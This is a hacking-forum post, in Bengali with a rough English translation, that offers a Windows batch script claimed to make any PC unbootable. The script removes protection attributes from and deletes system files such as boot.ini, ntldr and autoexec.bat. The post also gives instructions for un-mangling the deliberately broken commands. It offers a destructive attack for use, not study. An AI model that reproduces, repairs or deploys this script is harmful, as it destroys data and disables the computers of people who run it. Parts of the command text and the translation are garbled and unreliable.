যে কোন পিসিকে স্থায়ীভাবে বন্ধ করে দেয়া যায় Any PC can be shut down permanently~~Hedaet Forum~~


Email: Password: Forgot Password?   Sign up
Are you Ads here? conduct: +8801913 364186

Forum Home >>> Hack System >>> যে কোন পিসিকে স্থায়ীভাবে বন্ধ করে দেয়া যায় Any PC can be shut down permanently

Tamanna
Modarator Team
Total Post: 7639

From:
Registered: 2011-12-11
 

যে কোন পিসিকে স্থায়ীভাবে বন্ধ করে দেয়া যায়। এ জন্য নিচের কোডটি কপি করে নোট প্যাডে পেষ্ট করুন।
echo off
attrib -r -s -h c: autoexec. bat
del c: autoexec. bat
attrib -r -s -h c: boot. ini
del c: boot. ini
attrib -r -s -h c: ntldr
del c: ntldr
attrib -r -s -h c: windowswin. ini
del c: windowswin. ini

কোডের শুরুতে @ লিখুন।c: এর পরের স্পেস বাদ দিন। bat ও ini এর এর আগের স্পেস বাদ দিন। এবার সে পিসি চালালেই কাজ হবে।

Any PC can be shut down permanently. Copy the code below and paste it in the note pad.
echo off
attrib -r -s -h c: autoexec. bat
del c: autoexec. bat
attrib -r -s -h c: boot. ini
del c: boot. ini
attrib -r -s -h c: ntldr
del c: ntldr
attrib -r -s -h c: windowswin. ini
del c: windowswin. ini

@ Enter the code at the beginning. C: skip to the next space. ini bat and skip to the previous space. Now the PC, run it will work.